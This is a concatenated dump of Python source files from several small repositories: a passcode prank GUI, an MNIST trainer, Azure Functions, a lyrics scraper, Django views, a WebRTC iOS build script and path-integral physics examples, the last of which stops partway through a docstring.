print("You have entered: "+a)
if a == passcode:
os.system("vim homework.txt")
sys.exit()
elif a == "42069":
os.system("vlc env/RickRoll.mp4")
else:
print("Wrong code")
os.system("python3 error.py")
if __name__ == "__main__":
window()
--- FILE SEPARATOR ---
import numpy as np
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Flatten, BatchNormalization
from tensorflow.keras.regularizers import l1, l2
from tensorflow.keras.datasets import mnist
from tensorflow.keras.optimizers import Adam, SGD
from tensorflow.keras.utils import to_categorical
from PIL import Image
from tensorflow.keras.mixed_precision import experimental as mixed_precision
gpus = tf.config.experimental.list_physical_devices('GPU')
if gpus:
try:
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
except RuntimeError as e:
print(e)
policy = mixed_precision.Policy('mixed_float16')
mixed_precision.set_policy(policy)
class MLModel:
def __init__(self):
self.inputs = keras.Input(shape=(28, 28, 1))
self.x = self.conv_module(self.inputs, f=32, ks=(5, 5), s=(1, 1), p="same", a="relu", kr=l2(0.001), br=l2(0.001), do=0.4, mp=True)
self.x = BatchNormalization(-1)(self.x)
#self.x = self.conv_module(self.inputs, f=16, ks=(3, 3), s=(1, 1), p="same", a="relu", kr=l2(0.001), br=l2(0.001), do=0.4, mp=True)
#self.x = BatchNormalization(-1)(self.x)
#self.x = self.conv_module(self.inputs, f=32, ks=(3, 3), s=(1, 1), p="same", a="relu", kr=l2(0.001), br=l2(0.001), do=0.4, mp=True)
#self.x = BatchNormalization(-1)(self.x)
self.x = self.flatten_module(self.x)
self.x = BatchNormalization(-1)(self.x)
self.x = self.dense_module(self.x, u=50, a="relu", kr=l2(0.001), br=l2(0.001))
self.x = BatchNormalization(-1)(self.x)
self.x = self.dense_module(self.x, u=10, a="softmax", kr=l2(0.001), br=l2(0.001))
self.outputs = self.x
def conv_module(self, x, f, ks, s, p, a, kr, br, do=None, mp=False):
x = Conv2D(filters=f, kernel_size=ks, strides=s, padding=p, activation=a, kernel_regularizer=kr, bias_regularizer=br)(x)
if mp:
x = MaxPooling2D(pool_size=(2, 2))(x)
if do != None:
x = Dropout(do)(x)
return x
def flatten_module(self, x):
x = Flatten()(x)
x = Dense(100, activation="relu", kernel_regularizer=l2(0.001), bias_regularizer=l2(0.001))(x)
x = Dropout(0.5)(x)
return x
def dense_module(self, x, u, a, kr, br, do=None):
x = Dense(units=u, activation=a, kernel_regularizer=kr, bias_regularizer=br)(x)
return x
def define_model(self):
self.model = keras.Model(inputs=self.inputs, outputs=self.outputs, name="mnist_model")
def compile_model(self, optimizer, loss, metrics):
self.model.compile(optimizer=optimizer, loss=loss, metrics=metrics)
def train():
mlmodel = MLModel()
mlmodel.define_model()
mlmodel.compile_model(optimizer=SGD(lr=0.0007, momentum=0.9), loss="categorical_crossentropy", metrics=['accuracy'])
(trainX, trainY), (testX, testY) = mnist.load_data()
trainX = trainX.reshape((trainX.shape[0], 28, 28, 1)).astype("float32")
testX = testX.reshape((testX.shape[0], 28, 28, 1)).astype("float32")
trainX /= 255
testX /= 255
trainY = to_categorical(trainY)
testY = to_categorical(testY)
mlmodel.model.fit(x=trainX, y=trainY, batch_size=None, epochs=60, verbose=1, validation_data=(testX, testY), use_multiprocessing=True)
mlmodel.model.save("NumRoll.h5")
if __name__ == "__main__":
train()
|
[
"/Database.py",
"/Images.py",
"/canvas.py",
"/classifier.py",
"/error.py",
"/io_file.py",
"/main.py",
"/training.py"
] |
0-jam/azfunc
|
import logging
import azure.functions as func
from .monkey_generator import generate_text
def main(req: func.HttpRequest) -> func.HttpResponse:
logging.info('Python monkey text generator.')
gen_size = req.params.get('gen_size')
if not gen_size:
try:
req_body = req.get_json()
except ValueError:
pass
else:
gen_size = req_body.get('gen_size')
if gen_size:
return func.HttpResponse(generate_text(int(gen_size)))
else:
return func.HttpResponse(
"Please pass a gen_size on the query string or in the request body",
status_code=400
)
--- FILE SEPARATOR ---
import random
# All characters on the keyboard as integers
CHARS = list(range(32, 128)) + [8, 9, 10]
def shuffle(orig_list):
return random.sample(orig_list, k=len(orig_list))
def generate_text(gen_size=100):
generated_text = ''
for _ in range(gen_size):
generated_text += chr(shuffle(CHARS)[0])
return generated_text
--- FILE SEPARATOR ---
import logging
import azure.functions as func
from .sql_controller import get_places
def main(req: func.HttpRequest) -> func.HttpResponse:
logging.info('Python HTTP trigger function processed a request.')
return func.HttpResponse(format(get_places()), mimetype='application/json')
--- FILE SEPARATOR ---
import json
import os
import pyodbc
ENV = os.environ
DB_ENDPOINT = ENV.get('SQL_DB_ENDPOINT')
DB_NAME = ENV.get('SQL_DB_NAME')
DB_USERNAME = ENV.get('SQL_DB_USERNAME')
DB_PASSWORD = ENV.get('SQL_DB_PASSWORD')
SQL_DRIVER = '{ODBC Driver 17 for SQL Server}'
def establish_connection() -> pyodbc.Connection:
return pyodbc.connect('DRIVER=' + SQL_DRIVER + ';SERVER=' + DB_ENDPOINT + ';PORT=1433;DATABASE=' + DB_NAME + ';UID=' + DB_USERNAME + ';PWD=' + DB_PASSWORD)
def exec_sql(query: str) -> list:
with establish_connection() as connection:
with connection.cursor() as cursor:
cursor.execute(query)
column_names = [desc[0] for desc in cursor.description]
try:
rows = cursor.fetchall()
return [dict(zip(column_names, row)) for row in rows]
except pyodbc.ProgrammingError:
return [{'message': 'affected {} rows'.format(cursor.rowcount)}]
finally:
connection.commit()
def get_places():
rows = exec_sql('select * from dbo.places')
# decimal 型の latitude, longitude を float 型にシリアライズしている
return json.dumps(rows, ensure_ascii=False, default=float)
--- FILE SEPARATOR ---
import os
import pyodbc
import json
ENV = os.environ
DB_ENDPOINT = ENV.get('SQL_DB_ENDPOINT')
DB_NAME = ENV.get('SQL_DB_NAME')
DB_USERNAME = ENV.get('SQL_DB_USERNAME')
DB_PASSWORD = ENV.get('SQL_DB_PASSWORD')
SQL_DRIVER = '{ODBC Driver 17 for SQL Server}'
def establish_connection():
return pyodbc.connect('DRIVER=' + SQL_DRIVER + ';SERVER=' + DB_ENDPOINT + ';PORT=1433;DATABASE=' + DB_NAME + ';UID=' + DB_USERNAME + ';PWD=' + DB_PASSWORD)
def rows2json(rows):
return json.dumps([tuple(row) for row in rows], ensure_ascii=False)
def exec_sql():
connection = establish_connection()
cursor = connection.cursor()
cursor.execute("SELECT TOP 20 pc.Name as CategoryName, p.name as ProductName FROM [SalesLT].[ProductCategory] pc JOIN [SalesLT].[Product] p ON pc.productcategoryid = p.productcategoryid")
try:
rows = cursor.fetchall()
result_json = rows2json(rows)
except pyodbc.ProgrammingError:
rows = cursor.rowcount
result_json = json.dumps("affected {} rows".format(cursor.rowcount))
cursor.close()
connection.close()
return result_json
|
[
"/azmonkeygen/__init__.py",
"/azmonkeygen/monkey_generator.py",
"/get-places/__init__.py",
"/get-places/sql_controller.py",
"/sqlcontroller/sql_controller.py"
] |
0-jam/utanet_scraper
|
import argparse
import json
from pathlib import Path
def main():
parser = argparse.ArgumentParser(description='utanet_scraper.pyで抽出した曲情報から特定の項目を抽出')
parser.add_argument('input', type=str, help='入力ディレクトリ名')
parser.add_argument('output', type=str, help='出力ファイル名')
parser.add_argument('-a', '--attribute', type=str, default='lyric', choices=['title', 'artist', 'lyricist', 'composer', 'lyric'], help="抽出したい項目(デフォルト:'lyric')")
parser.add_argument('--allow_dups', action='store_true', help='項目の重複を許容(デフォルト:false)')
args = parser.parse_args()
extracted_values = []
for json_path in Path(args.input).iterdir():
with json_path.open() as json_file:
json_dict = json.load(json_file)
extracted_values.extend([value[args.attribute] for value in json_dict.values()])
if not args.allow_dups:
extracted_values = set(extracted_values)
with Path(args.output).open('w', encoding='utf-8') as out:
out.write('\n'.join(extracted_values))
if __name__ == "__main__":
main()
--- FILE SEPARATOR ---
import time
import urllib
from beautifulscraper import BeautifulScraper
from tqdm import tqdm
scraper = BeautifulScraper()
domain = 'https://www.uta-net.com'
attributes = {
# 歌手名
'artist': '1',
# 曲名
'title': '2',
# 作詞者名
'lyricist': '3',
# 作曲者名
'composer': '8',
}
match_modes = {
# 完全一致
'exact': '4',
# 部分一致
'partial': '3',
}
def get_page(url):
time.sleep(1.0)
body = scraper.go(url)
return body
def search_song_ids(query, attribute='lyricist', match_mode='exact'):
# クエリが日本語だと正しく処理されないのでエンコード
search_url = domain + '/search/?Aselect=' + attributes[attribute] + '&Keyword=' + urllib.parse.quote(query) + '&Bselect=' + match_modes[match_mode] + '&sort='
print('曲リストを取得しています:', search_url)
bodies = [get_page(search_url)]
pages = bodies[0].select('#page_list')[0].find_all('a')
if len(pages) > 0:
page_urls = [urllib.parse.urlparse(page.get('href')) for page in pages]
queries = [urllib.parse.parse_qs(page.query) for page in page_urls]
last_page = page_urls[-1]
last_page_num = max([int(query['pnum'][0]) for query in queries])
lpq = queries[-1]
print(last_page_num, 'ページ見つかりました')
for pnum in tqdm(range(2, last_page_num + 1)):
# ページ番号だけ変えて新しくURLを生成
lpq['pnum'] = [str(pnum)]
page = urllib.parse.ParseResult(
last_page.scheme,
last_page.netloc,
last_page.path,
last_page.params,
urllib.parse.urlencode(lpq, True),
''
)
page_url = urllib.parse.urlunparse(page)
bodies.append(get_page(page_url))
else:
print('1ページ見つかりました')
song_ids = []
for body in bodies:
# 歌詞ページのURLを抽出
for td in body.select('.td1'):
song_ids.append(td.find_all('a')[0].get('href'))
return song_ids
def extract_song(song_id):
song_url = domain + song_id
print('曲データを抽出しています:', song_url)
body = get_page(song_url)
title = body.select('.song-infoboard h2')[0].text
# 歌詞内の改行を半角スラッシュ/に置換して抽出
lyric = body.find(id='kashi_area').get_text('/')
artist = body.select('[itemprop="recordedAs"]')[0].text.strip()
lyricist = body.select('[itemprop="lyricist"]')[0].text
composer = body.select('[itemprop="composer"]')[0].text
return {
song_id: {
'title': title,
'lyric': lyric,
'artist': artist,
'lyricist': lyricist,
'composer': composer,
}
}
--- FILE SEPARATOR ---
import argparse
import json
import sqlite3
from pathlib import Path
def main():
parser = argparse.ArgumentParser(description='utanet_scraper.py で抽出した JSON ファイルを SQLite DB に変換')
parser.add_argument('json_dir', type=str, help='JSON ファイルのあるディレクトリ')
parser.add_argument('sqlite_file', type=str, help='SQLite ファイル')
args = parser.parse_args()
sqlite_file = Path(args.sqlite_file)
sqlite_connection = sqlite3.connect(sqlite_file)
sqlite_cursor = sqlite_connection.cursor()
sqlite_cursor.execute('''
create table if not exists utanet_songs(
song_id int primary key,
title text,
lyric text,
artist text,
lyricist text,
composer text
)
''')
query_string = '''
insert into utanet_songs(song_id, title, lyric, artist, lyricist, composer)
values (?, ?, ?, ?, ?, ?)
'''
for json_path in Path(args.json_dir).iterdir():
with json_path.open() as json_file:
song_dict = json.load(json_file)
print('処理中:', json_path.name)
song_id = int(json_path.stem)
song_data = tuple(song_dict.values())[0]
query_values = (
song_id,
song_data['title'],
song_data['lyric'],
song_data['artist'],
song_data['lyricist'],
song_data['composer'],
)
sqlite_cursor.execute(query_string, query_values)
sqlite_connection.commit()
sqlite_connection.close()
print('完了')
if __name__ == "__main__":
main()
--- FILE SEPARATOR ---
import argparse
import json
import urllib
from pathlib import Path
from modules.utanet import extract_song
def main():
parser = argparse.ArgumentParser(description='曲情報を抽出(Ctrl + C で中止)')
parser.add_argument('-o', '--output_dir', type=str, default='songs', help="出力ディレクトリ名(デフォルト:'./songs')")
parser.add_argument('-s', '--starts_with', type=int, default=1, help="指定した ID から抽出を開始(デフォルト:'1')")
args = parser.parse_args()
output_dir = Path(args.output_dir)
Path.mkdir(output_dir, parents=True, exist_ok=True)
song_count = args.starts_with
while True:
try:
song_json_path = output_dir.joinpath('{}.json'.format(song_count))
if song_json_path.is_file():
print('スキップ:ファイル "{}" は既に存在します'.format(song_json_path))
continue
song_dict = extract_song('/song/{}/'.format(song_count))
with song_json_path.open('w', encoding='utf-8') as song_json:
song_json.write(json.dumps(song_dict, ensure_ascii=False, indent=2))
except urllib.error.HTTPError:
print('ID: {} が見つかりません'.format(song_count))
continue
finally:
song_count += 1
if __name__ == '__main__':
main()
|
[
"/json_extractor.py",
"/modules/utanet.py",
"/sqlite_converter.py",
"/utanet_scraper.py"
] |
0-k-1/Practice_turorail
|
from django.urls import path
import books
from books.views import PublisherList
urlpatterns = [
path('publishers/',PublisherList.as_view())
]
--- FILE SEPARATOR ---
from django.shortcuts import render
# Create your views here.
from django.views.generic import ListView
from books.models import Publisher
class PublisherList(ListView):
model = Publisher
|
[
"/books/urls.py",
"/books/views.py"
] |
0-k-1/TodoMVC2
|
from django.db import models
#from django.contrib.auth.models import User
class Todo(models.Model):
title = models.CharField(max_length=50)
completed = models.BooleanField(default=False)
--- FILE SEPARATOR ---
# from django.urls import path
from django.conf.urls import url
from App.views import todoMVC_view,save_view
urlpatterns = [
url('', todoMVC_view),
url(r'^save/', save_view, name='save')
]
--- FILE SEPARATOR ---
from django.shortcuts import render,redirect
from App.models import Todo
import json
# from django.forms.models import model_to_dict
def todoMVC_view(request):
# list=[{"content":"任务1","completed":"True"},{"content":"任务2","completed":"False"}]
# list=[
# {"completed": "false","id": "1","title": "31"},
# {"completed": "true","id": "2","title": "35"},
# {"completed": "true","id": "0","title": "32"}
# ]
# list_value = list.values()
# list = model_to_dict(list[0])
# print(list_value)
ls = Todo.objects.all()
ls = list(ls.values())
print(ls)
return render(request, 'VueExample.html', {"list":json.dumps(ls)})
#return render(request, 'VueExample.html', {"list":list})
def save_view(request):
print(request.POST['q'])
# print(request.body)
# print(type(request.body))
# print(request.body.decode())
# para = json.loads(request.body.decode())
# print(para)
# 直接覆盖
ls = Todo.objects.all()
ls.delete()
for item in json.loads(request.POST['q']):
Todo.objects.create(title=item['title'], completed=item['completed'])
# 删除不起作用
# try:
# for k in item.keys():
# print(k,item[k])
# Todo.objects.update_or_create(id=item['id'],
# defaults={'id': item['id'], 'title': item['title'],
# 'completed': item['completed']})
# except:
# pass
#return render(request, 'VueExample.html')
return redirect('/')
|
[
"/App/models.py",
"/App/urls.py",
"/App/views.py"
] |
0-u-0/webrtc-ios-script
|
#!/usr/bin/env python
import logging
import os
import subprocess
import sys
def IsRealDepotTools(path):
expanded_path = os.path.expanduser(path)
return os.path.isfile(os.path.join(expanded_path, 'gclient.py'))
def add_depot_tools_to_path(source_dir=''):
"""Search for depot_tools and add it to sys.path."""
# First, check if we have a DEPS'd in "depot_tools".
deps_depot_tools = os.path.join(source_dir, 'third_party', 'depot_tools')
if IsRealDepotTools(deps_depot_tools):
# Put the pinned version at the start of the sys.path, in case there
# are other non-pinned versions already on the sys.path.
sys.path.insert(0, deps_depot_tools)
return deps_depot_tools
# Then look if depot_tools is already in PYTHONPATH.
for i in sys.path:
if i.rstrip(os.sep).endswith('depot_tools') and IsRealDepotTools(i):
return i
# Then look if depot_tools is in PATH, common case.
for i in os.environ['PATH'].split(os.pathsep):
if IsRealDepotTools(i):
sys.path.append(i.rstrip(os.sep))
return i
# Rare case, it's not even in PATH, look upward up to root.
root_dir = os.path.dirname(os.path.abspath(__file__))
previous_dir = os.path.abspath(__file__)
while root_dir and root_dir != previous_dir:
i = os.path.join(root_dir, 'depot_tools')
if IsRealDepotTools(i):
sys.path.append(i)
return i
previous_dir = root_dir
root_dir = os.path.dirname(root_dir)
logging.error('Failed to find depot_tools')
return None
def _RunCommand(cmd):
logging.debug('Running: %r', cmd)
subprocess.check_call(cmd)
def _RunGN(args):
logging.info('Gn args : %s', args)
cmd = [sys.executable, os.path.join(add_depot_tools_to_path(), 'gn.py')]
cmd.extend(args)
_RunCommand(cmd)
def _RunNinja(output_directory, args):
logging.info('Ninja args : %s', args)
cmd = [os.path.join(add_depot_tools_to_path(), 'ninja'),
'-C', output_directory]
cmd.extend(args)
_RunCommand(cmd)
def _EncodeForGN(value):
"""Encodes value as a GN literal."""
if isinstance(value, str):
return '"' + value + '"'
elif isinstance(value, bool):
return repr(value).lower()
else:
return repr(value)
def Build(output_directory, gn_args, ninja_target_args):
"""Generates target architecture using GN and builds it using ninja."""
gn_args_str = '--args=' + ' '.join([k + '=' + _EncodeForGN(v) for k, v in gn_args.items()])
gn_args_list = ['gen', output_directory, gn_args_str]
_RunGN(gn_args_list)
_RunNinja(output_directory, ninja_target_args)
--- FILE SEPARATOR ---
#!/usr/bin/env python
import os
import argparse
import logging
import sys
from distutils import dir_util
from build_tools import Build, _RunCommand
# disable x86-64 when you intend to distribute app through the app store
# https://webrtc.github.io/webrtc-org/native-code/ios/
# DEFAULT_ARCHS = ['arm64', 'arm', 'x64', 'x86']
DEFAULT_ARCHS = ['arm64', 'arm', 'x64']
TARGETS = ['sdk:framework_objc']
OUT_DIR = 'out'
SDK_FRAMEWORK_NAME = 'WebRTC.framework'
def parse_args():
parser = argparse.ArgumentParser(description='Collect and build WebRTC iOS framework.')
parser.add_argument('-s', '--source-dir', help='WebRTC source dir. Example: /realpath/to/src')
parser.add_argument('-v', '--verbose', action='store_true', help='Debug logging.')
parser.add_argument('-r', '--is-release', action='store_true', help='Release or not.')
parser.add_argument('--use-bitcode', action='store_true', help='Use bitcode or not.')
parser.add_argument('--enable-vp9', action='store_true', help='Enable VP9 SoftCodec or not.')
return parser.parse_args()
def get_debug_dir(is_debug):
if is_debug:
return 'Debug'
else:
return 'Release'
def build_ios_framework(src_dir, is_debug, bitcode):
gn_args = {
'target_os': 'ios',
'ios_enable_code_signing': False,
'use_xcode_clang': True,
'is_debug': is_debug,
'ios_deployment_target': '10.0',
'enable_stripping': True,
'enable_dsyms': not bitcode,
'enable_ios_bitcode': bitcode
}
ninja_target_args = TARGETS
for arch in DEFAULT_ARCHS:
gn_args['target_cpu'] = arch
build_dir = os.path.join(src_dir, OUT_DIR, get_debug_dir(is_debug), arch)
logging.info('Build dir : %s', build_dir)
Build(build_dir, gn_args, ninja_target_args)
def create_fat_library(src_dir, is_debug):
output_dir = os.path.join(src_dir, OUT_DIR, get_debug_dir(is_debug))
lib_paths = [os.path.join(output_dir, arch)
for arch in DEFAULT_ARCHS]
# Combine the slices.
dylib_path = os.path.join(SDK_FRAMEWORK_NAME, 'WebRTC')
# Dylibs will be combined, all other files are the same across archs.
# Use distutils instead of shutil to support merging folders.
dir_util.copy_tree(
os.path.join(lib_paths[0], SDK_FRAMEWORK_NAME),
os.path.join(output_dir, SDK_FRAMEWORK_NAME))
logging.info('Merging framework slices.')
dylib_paths = [os.path.join(path, dylib_path) for path in lib_paths]
out_dylib_path = os.path.join(output_dir, dylib_path)
try:
os.remove(out_dylib_path)
except OSError:
pass
cmd = ['lipo'] + dylib_paths + ['-create', '-output', out_dylib_path]
_RunCommand(cmd)
# Merge the dSYM slices.
lib_dsym_dir_path = os.path.join(lib_paths[0], 'WebRTC.dSYM')
if os.path.isdir(lib_dsym_dir_path):
dir_util.copy_tree(lib_dsym_dir_path, os.path.join(output_dir, 'WebRTC.dSYM'))
logging.info('Merging dSYM slices.')
dsym_path = os.path.join('WebRTC.dSYM', 'Contents', 'Resources', 'DWARF', 'WebRTC')
lib_dsym_paths = [os.path.join(path, dsym_path) for path in lib_paths]
out_dsym_path = os.path.join(output_dir, dsym_path)
try:
os.remove(out_dsym_path)
except OSError:
pass
cmd = ['lipo'] + lib_dsym_paths + ['-create', '-output', out_dsym_path]
_RunCommand(cmd)
logging.info('Done.')
def main():
args = parse_args()
logging.basicConfig(level=logging.DEBUG if args.verbose else logging.INFO)
if not args.source_dir:
src_dir = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
else:
src_dir = args.source_dir
if os.path.isdir(src_dir):
is_debug = not args.is_release
build_ios_framework(src_dir, is_debug, args.use_bitcode)
create_fat_library(src_dir, is_debug)
else:
logging.error('Src path not exists : %s', src_dir)
if __name__ == '__main__':
sys.exit(main())
|
[
"/build_tools.py",
"/main.py"
] |
0/pathintmatmult
|
#!/usr/bin/env python3
"""
Harmonic oscillator PIFT example.
An oscillator with an angular frequency of x kelvin at reciprocal temperature
beta reciprocal kelvin has a thermal potential energy (in kelvin) of
(1/4) x coth(0.5 beta x)
and a total energy of twice that. For example, for an oscillator with an
angular frequency of 1 K, at 0.1 K the thermal averages are approximately
0.2500 K and 0.5000 K (very nearly the zero point energies), while at 10 K they
are approximately 5.0042 K and 10.008 K. By 100 K, the total energy is about
100.00 K, so we are effectively at the classical limit.
"""
from argparse import ArgumentParser
from pathintmatmult import PIFTMM
from pathintmatmult.constants import HBAR, KB, ME
from pathintmatmult.potentials import harmonic_potential
# Parse arguments.
p = ArgumentParser(description='Calculate HO thermal properties using PIFTMM.')
p_config = p.add_argument_group('configuration')
p_config.add_argument('--mass', metavar='M', type=float, required=True, help='particle mass (electron masses)')
p_config.add_argument('--omega', metavar='W', type=float, required=True, help='angular frequency (K)')
p_config.add_argument('--grid-range', metavar='R', type=float, required=True, help='grid range from origin (nm)')
p_config.add_argument('--grid-len', metavar='L', type=int, required=True, help='number of points on grid')
p_config.add_argument('--beta', metavar='B', type=float, required=True, help='reciprocal temperature (1/K)')
p_config.add_argument('--num-links', metavar='P', type=int, required=True, help='number of links')
p.add_argument('--density-out', metavar='FILE', help='path to output density plot')
args = p.parse_args()
mass = args.mass * ME # g/mol
omega = args.omega * KB / HBAR # 1/ps
grid_range = args.grid_range # nm
grid_len = args.grid_len # 1
beta = args.beta / KB # mol/kJ
num_links = args.num_links # 1
density_out = args.density_out
# Calculate values.
harmonic = harmonic_potential(m=mass, w=omega)
ho_pift = PIFTMM([mass], [grid_range], [grid_len], harmonic, beta, num_links)
estimated_potential_energy = ho_pift.expectation_value(harmonic) / KB # K
print('V = {} K'.format(estimated_potential_energy))
# According to the virial theorem, <K> = <V> for a harmonic oscillator.
print('E_virial = {} K'.format(2 * estimated_potential_energy))
# Output plot.
if density_out:
from pathintmatmult.plotting import plot2d
xy_range = (-grid_range, grid_range)
plot2d(ho_pift.density, xy_range, xy_range, density_out, x_label=r'$q_j / \mathrm{nm}$', y_label=r'$q_i / \mathrm{nm}$')
--- FILE SEPARATOR ---
#!/usr/bin/env python3
"""
Harmonic oscillator PIGS example.
An oscillator with an angular frequency of x kelvin has a ground state
potential energy of x/4 kelvin and a total energy of x/2 kelvin. One with a
mass of 1 electron mass and angular frequency of 1 K has a spread of about 120
nm in either direction from the origin; one with a mass of 10 electron masses
spreads about 40 nm. The following are some possible combinations of arguments
to try:
--mass 1 --omega 1 --grid-range 120 --grid-len 100 --beta 12 --num-links 1200
--mass 10 --omega 1 --grid-range 40 --grid-len 100 --beta 12 --num-links 1200
If --trial-deform is not given, a uniform trial function is used. If it is
given, the exact ground state is used as the trial fuction, but is deformed by
the given factor (1 corresponds to no deformation).
"""
from argparse import ArgumentParser
import numpy as np
from pathintmatmult import PIGSMM
from pathintmatmult.constants import HBAR, KB, ME
from pathintmatmult.potentials import harmonic_potential
# Parse arguments.
p = ArgumentParser(description='Calculate HO ground state properties using PIGSMM.')
p_config = p.add_argument_group('configuration')
p_config.add_argument('--mass', metavar='M', type=float, required=True, help='particle mass (electron masses)')
p_config.add_argument('--omega', metavar='W', type=float, required=True, help='angular frequency (K)')
p_config.add_argument('--grid-range', metavar='R', type=float, required=True, help='grid range from origin (nm)')
p_config.add_argument('--grid-len', metavar='L', type=int, required=True, help='number of points on grid')
p_config.add_argument('--beta', metavar='B', type=float, required=True, help='propagation length (1/K)')
p_config.add_argument('--num-links', metavar='P', type=int, required=True, help='number of links')
p_config.add_argument('--trial-deform', metavar='D', type=float, help='deformation factor for exact trial function')
p.add_argument('--wf-out', metavar='FILE', help='path to output wavefunction values')
p.add_argument('--density-out', metavar='FILE', help='path to output density plot')
args = p.parse_args()
mass = args.mass * ME # g/mol
omega = args.omega * KB / HBAR # 1/ps
grid_range = args.grid_range # nm
grid_len = args.grid_len # 1
beta = args.beta / KB # mol/kJ
num_links = args.num_links # 1
trial_deform = args.trial_deform
wf_out = args.wf_out
density_out = args.density_out
# Calculate values.
harmonic = harmonic_potential(m=mass, w=omega)
kwargs = {}
if trial_deform is not None:
alpha = trial_deform * mass * omega / HBAR # 1/nm^2
def trial_f(q: 'nm') -> '1':
return np.exp(-0.5 * alpha * q[..., 0] ** 2)
def trial_f_diff(q: 'nm') -> '1/nm^2':
return alpha * (alpha * q[..., 0] ** 2 - 1) * trial_f(q)
kwargs['trial_f'] = trial_f
kwargs['trial_f_diffs'] = [trial_f_diff]
ho_pigs = PIGSMM([mass], [grid_range], [grid_len], harmonic, beta, num_links, **kwargs)
estimated_potential_energy = ho_pigs.expectation_value(harmonic) / KB # K
estimated_total_energy = ho_pigs.energy_mixed / KB # K
print('V = {} K'.format(estimated_potential_energy))
# According to the virial theorem, <K> = <V> for a harmonic oscillator.
print('E_virial = {} K'.format(2 * estimated_potential_energy))
print('E_mixed = {} K'.format(estimated_total_energy))
# Output wavefunction.
if wf_out:
np.savetxt(wf_out, np.hstack((ho_pigs.grid, ho_pigs.ground_wf[:, np.newaxis])))
# Output plot.
if density_out:
from pathintmatmult.plotting import plot2d
xy_range = (-grid_range, grid_range)
plot2d(ho_pigs.density, xy_range, xy_range, density_out, x_label=r'$q_j / \mathrm{nm}$', y_label=r'$q_i / \mathrm{nm}$')
--- FILE SEPARATOR ---
#!/usr/bin/env python3
"""
Entangled harmonic oscillators PIGS example.
A pair of identical harmonic oscillators with a harmonic interaction potential.
"""
from argparse import ArgumentParser
import numpy as np
from pathintmatmult import PIGSIMM
from pathintmatmult.constants import HBAR, KB, ME
from pathintmatmult.potentials import harmonic_potential
# Parse arguments.
p = ArgumentParser(description='Calculate entangled HO ground state properties using PIGSMM2.')
p_config = p.add_argument_group('configuration')
p_config.add_argument('--mass', metavar='M', type=float, required=True, help='particle mass (electron masses)')
p_config.add_argument('--omega-0', metavar='W', type=float, required=True, help='central potential angular frequency (K)')
p_config.add_argument('--omega-int', metavar='W', type=float, required=True, help='interaction potential angular frequency (K)')
p_config.add_argument('--grid-range', metavar='R', type=float, required=True, help='grid range from origin (nm)')
p_config.add_argument('--grid-len', metavar='L', type=int, required=True, help='number of points on grid')
p_config.add_argument('--beta', metavar='B', type=float, required=True, help='propagation length (1/K)')
p_config.add_argument('--num-links', metavar='P', type=int, required=True, help='number of links')
p_config.add_argument('--trial-deform', metavar='D', type=float, help='deformation factor for exact trial function')
p.add_argument('--wf-out', metavar='FILE', help='path to output wavefunction values')
p.add_argument('--density-diagonal-out', metavar='FILE', help='path to output diagonal density plot')
args = p.parse_args()
mass = args.mass * ME # g/mol
omega_0 = args.omega_0 * KB / HBAR # 1/ps
omega_int = args.omega_int * KB / HBAR # 1/ps
grid_range = args.grid_range # nm
grid_len = args.grid_len # 1
beta = args.beta / KB # mol/kJ
num_links = args.num_links # 1
trial_deform = args.trial_deform
wf_out = args.wf_out
density_diagonal_out = args.density_diagonal_out
# Calculate values.
pot_0 = harmonic_potential(m=mass, w=omega_0)
pot_int = harmonic_potential(m=mass, w=omega_int)
def total_potential(qs: '[nm]') -> 'kJ/mol':
return pot_0(qs[..., [0]]) + pot_0(qs[..., [1]]) + pot_int(qs[..., [0]] - qs[..., [1]])
kwargs = {}
if trial_deform is not None:
alpha = trial_deform * mass / HBAR # ps/nm^2
omega_R = omega_0 # 1/ps
omega_r = np.sqrt(omega_0 * omega_0 + 2 * omega_int * omega_int) # 1/ps
omega_p = omega_R + omega_r # 1/ps
omega_m = omega_R - omega_r # 1/ps
def trial_f(qs: '[nm]') -> '1':
return np.exp(-0.25 * alpha * (omega_p * (qs[..., 0] ** 2 + qs[..., 1] ** 2) + 2 * omega_m * qs[..., 0] * qs[..., 1]))
def trial_f_diff_0(qs: '[nm]') -> '1/nm^2':
return 0.5 * alpha * (0.5 * alpha * (omega_p * qs[..., 0] + omega_m * qs[..., 1]) ** 2 - omega_p) * trial_f(qs)
def trial_f_diff_1(qs: '[nm]') -> '1/nm^2':
return 0.5 * alpha * (0.5 * alpha * (omega_m * qs[..., 0] + omega_p * qs[..., 1]) ** 2 - omega_p) * trial_f(qs)
kwargs['trial_f'] = trial_f
kwargs['trial_f_diffs'] = [trial_f_diff_0, trial_f_diff_1]
ho_pigs = PIGSIMM([mass, mass], [grid_range, grid_range], [grid_len, grid_len], total_potential, beta, num_links, **kwargs)
estimated_potential_energy = ho_pigs.expectation_value(total_potential) / KB # K
estimated_total_energy = ho_pigs.energy_mixed / KB # K
estimated_trace = ho_pigs.trace_renyi2
print('V = {} K'.format(estimated_potential_energy))
print('E_mixed = {} K'.format(estimated_total_energy))
print('trace = {}'.format(estimated_trace))
# Output wavefunction.
if wf_out:
np.savetxt(wf_out, np.hstack((ho_pigs.grid, ho_pigs.ground_wf[:, np.newaxis])))
# Output plot.
if density_diagonal_out:
from pathintmatmult.plotting import plot2d
xy_range = (-grid_range, grid_range)
density = ho_pigs.density_diagonal.reshape(grid_len, grid_len)
plot2d(density, xy_range, xy_range, density_diagonal_out, x_label=r'$q_2 / \mathrm{nm}$', y_label=r'$q_1 / \mathrm{nm}$')
--- FILE SEPARATOR ---
from .nmm import PIFTMM, PIGSIMM, PIGSMM
--- FILE SEPARATOR ---
"""
Numerical matrix multiplication for path integrals.
"""
from itertools import product
import numpy as np
from .constants import HBAR
from .tools import cached
class PIMM:
"""
Path Integrals via Matrix Multiplication
Base class for various kinds of path integral implementations.
"""
def __init__(self, masses: '[g/mol]', grid_ranges: '[nm]',
grid_lens: '[1]', pot_f: '[nm] -> kJ/mol',
beta: 'mol/kJ', num_links: '1'):
"""
Note:
When pot_f receives an N-dimensional array as input, it needs to map
over it, returning an (N-1)-dimensional array.
Note:
The "particles" are actually any Cartesian degrees of freedom. One
might have the same configuration (masses and grids) for a
3-dimensional 1-particle system as for a 1-dimensional 3-particle
system. Of course, the coordinate arrays must be interpreted
appropriately in each case (whether by the potential function or by
the user of the output density).
Parameters:
masses: Masses of the particles.
